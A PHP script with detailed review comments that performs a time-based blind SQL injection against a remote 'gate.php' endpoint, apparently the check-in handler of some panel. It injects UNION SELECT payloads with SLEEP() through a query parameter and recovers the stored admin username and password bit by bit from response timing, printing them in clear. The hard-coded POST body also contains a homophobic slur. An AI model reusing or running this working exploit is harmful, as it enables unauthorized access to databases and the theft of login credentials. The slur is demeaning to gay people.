<?php
// Disable max_execution_time: every "true" answer below costs a SLEEP_TIME-second
// round trip, and get_length()/get_string() issue one request per guess.
set_time_limit(0);
// Seconds the injected SLEEP() asks the database to delay (string; it is only
// ever concatenated into the query text in get_length()/get_char()).
define( 'SLEEP_TIME' , '4' );
// Response-time threshold (seconds) at or above which is_true() reports true.
// It equals SLEEP_TIME, so any unrelated delay of >= 4 s is also read as "true".
define( 'PAGE_TIME' , 4);
// NOTE(review): URL is not defined anywhere on this page; as written this line
// (and the request URLs built from URL in is_true()) cannot run.
echo ( 'attacking ' . URL . PHP_EOL);
// Reads the `username` and `password` rows of the remote `settings` table
// (the WHERE `key` = ... clause lives in get_length()/get_char()); each call
// echoes the recovered value, including the password, to stdout in clear.
get_string( 'username' );
get_string( 'password' );
/**
 * Finds LENGTH(settings.value) for the row whose `key` is $field by counting up
 * from 1 until the injected condition makes the server SLEEP() (is_true() true).
 * Costs one HTTP request per candidate length. The loop has no upper bound: a
 * missing row, or a host that never delays, keeps it running forever (the
 * execution-time limit is disabled at the top of the file).
 *
 * @param string $field value of settings.`key` to look up
 * @return int first length for which the server delayed
 */
function get_length( $field ) {
$length = 1;
// Delays (=> true) only when LENGTH(value) == $length; otherwise returns at once.
while (!is_true( "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- " )) {
++ $length ;
}
echo ( $field . ' length: ' . $length . PHP_EOL);
return $length ;
}
/**
 * Reconstructs settings.value for $field one byte at a time: get_length() for
 * the size, then get_char() for each 0-based position. After every byte the
 * partial result is echoed, right-padded with '*' to the full length.
 *
 * @param string $field value of settings.`key` to read
 * @return string the recovered value
 */
function get_string( $field ) {
$length = get_length( $field );
$str = '' ;
for ( $i = 0; $i < $length ; ++ $i ) {
$str .= chr (get_char( $field , $i ));
// Progress line: recovered prefix followed by one '*' per byte still unknown.
echo ( $field . ' : ' . str_pad ( $str , $length , '*' ) . PHP_EOL);
}
return $str ;
}
/**
 * Recovers byte $id (0-based) of settings.value for $field, testing bits
 * 1, 2, 4, ..., 64 with one request each (seven requests per byte). Bit 128 is
 * never queried and is hard-wired to 0, i.e. the value is assumed to be 7-bit
 * ASCII. A probe delays the response (is_true() true) exactly when its bit is set.
 * The '1 ' / ' 0' literals contain spaces; bindec() skips non-binary characters
 * (with a deprecation notice on PHP >= 7.4), so the result is still the 7-bit value.
 *
 * @param string $field value of settings.`key`
 * @param int $id 0-based byte position (SUBSTR is 1-based, hence $id + 1)
 * @return int the byte value, 0..127
 */
function get_char( $field , $id ) {
$binary = '' ;
// Bits are appended most-significant-first by prepending each new bit.
for ( $i = 1; $i < 256; $i *= 2) {
if ( $i == 128)
$binary = '0' . $binary ;
else
$binary = (is_true( "' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ( $id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- " ) ? '1 ' : ' 0') . $binary ;
}
return bindec ( $binary );
}
/**
 * Sends one probe and answers true when the server took at least PAGE_TIME
 * seconds to respond. Timing is the only signal used; the response body
 * returned by post_request() is discarded.
 *
 * The POST body is a fixed string RC4-encrypted under the 4-byte key 'aaaa',
 * with that key then prepended in clear, so every request body starts with the
 * literal bytes "aaaa". NOTE(review): presumably this mimics the format
 * gate.php expects for a check-in; confirm against the handler.
 * $query is URL-encoded and appended to the `i` query parameter after
 * '127.0.0.1' (URL is not defined on this page).
 * Any delay of >= PAGE_TIME seconds — network latency, a slow host, or curl
 * hitting the 30 s CURLOPT_TIMEOUT set in post_request() — also registers as
 * true, which corrupts the recovered bits.
 *
 * @param string $query SQL fragment to append to the `i` parameter
 * @return bool true when the response took at least PAGE_TIME seconds
 */
function is_true( $query ) {
$rc4_key = 'aaaa' ;
$data = 'u=tapz&d=faggot&b=lol' ;
$encode = rc4( $rc4_key , $data , strlen ( $data ), strlen ( $rc4_key ));
// Key travels in clear in front of the ciphertext.
$encode = $rc4_key . $encode ;
$injection = urlencode( $query );
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection , $encode );
// Elapsed time >= PAGE_TIME  =>  "true".
return !( $req [ 'time' ] < PAGE_TIME);
}
/**
 * One HTTP POST via curl, timed with the wall clock.
 *
 * Sends $data as the raw POST body with a fixed desktop Chrome 32 User-Agent,
 * no response headers, and a 30 s overall timeout. The elapsed time brackets
 * curl_exec() only, so connect + transfer (or the timeout) is what callers see.
 * A failed transfer leaves curl_exec()'s false in 'page' unchanged; the caller
 * decides what to do with it.
 *
 * @param string $url full request URL, query string included
 * @param string $data raw POST body
 * @return array{page: string|false, time: float}
 */
function post_request( $url , $data ) {
    $ch = curl_init( $url );
    curl_setopt_array( $ch, array(
        CURLOPT_HEADER => false,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $data,
        CURLOPT_TIMEOUT => 30,
    ) );
    $started = microtime(true);
    $body = curl_exec( $ch );
    $elapsed = microtime(true) - $started;
    curl_close( $ch );
    return array(
        'page' => $body,
        'time' => $elapsed,
    );
}
/**
 * Plain RC4 (KSA + PRGA) applied byte-wise to $data; the same call decrypts.
 * RC4 is a broken stream cipher and is used here only to match the format the
 * remote endpoint expects, not for any confidentiality guarantee.
 *
 * $pwd_length and $data_length are taken as given: $pwd is indexed modulo
 * $pwd_length (0 raises a modulo-by-zero error) and exactly $data_length bytes
 * of $data are processed.
 *
 * @param string $pwd key bytes
 * @param string $data input bytes
 * @param int $data_length number of bytes of $data to process
 * @param int $pwd_length number of key bytes to cycle through
 * @return string ciphertext (or plaintext) of length $data_length
 */
function rc4( $pwd , $data , $data_length , $pwd_length ){
    // Key schedule: identity permutation, key repeated to 256 bytes.
    $state = range(0, 255);
    $keyBytes = array();
    for ($n = 0; $n < 256; $n++) {
        $keyBytes[$n] = ord($pwd[$n % $pwd_length]);
    }
    $j = 0;
    foreach ($keyBytes as $n => $keyByte) {
        $j = ($j + $state[$n] + $keyByte) % 256;
        list($state[$n], $state[$j]) = array($state[$j], $state[$n]);
    }
    // Keystream generation, XORed into the output one byte at a time.
    $out = '';
    $a = 0;
    $j = 0;
    for ($pos = 0; $pos < $data_length; $pos++) {
        $a = ($a + 1) % 256;
        $j = ($j + $state[$a]) % 256;
        list($state[$a], $state[$j]) = array($state[$j], $state[$a]);
        $keystreamByte = $state[($state[$a] + $state[$j]) % 256];
        $out .= chr(ord($data[$pos]) ^ $keystreamByte);
    }
    return $out;
}